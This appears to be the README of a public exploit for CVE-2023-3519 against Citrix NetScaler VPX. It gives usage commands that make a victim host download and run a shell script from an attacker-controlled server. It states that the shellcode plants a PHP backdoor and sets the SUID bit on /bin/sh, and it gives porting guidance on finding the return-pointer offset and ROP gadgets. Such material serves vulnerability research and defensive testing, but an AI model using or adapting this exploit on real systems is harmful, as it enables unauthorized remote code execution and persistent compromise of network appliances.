This exploit uses addresses and shellcode for Citrix VPX 13.1-48.47. For the full writeup, click here.

NASM is required to build the shellcode.

$ sudo apt install nasm

The included shellcode will download and run a shell script from a remote http(s) server. The script takes 3 arguments: the target host, the target port, and the URL of a shell script payload. An example payload which runs id and uname -a before cleaning up after itself is included in this repo.

$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

The URL must be short enough to fit in the shellcode buffer, and you will get a warning if it is too long.

The shellcode will create a PHP backdoor in /var/netscaler/logon/a.php and set the SUID bit on /bin/sh. The included sh payload shows an example of automatically cleaning up these artifacts. Also note that the shellcode does not close its file descriptors, so excessive repeated exploitation may result in resource exhaustion.

For FreeBSD-based Citrix targets, you should only need to find 3 values: the offset of the saved return pointer, a jmp rsp ROP gadget (or something equivalent, such as push rsp; ret;), and the address to jump to in order to avoid a crash. These parameters are all hardcoded near the top of cve-2023-3519.py. For certain versions you may also need to find a fourth value to fixup the RBP value, since the compiler generates RBP-relative loads instead of using POP instructions to restore saved registers.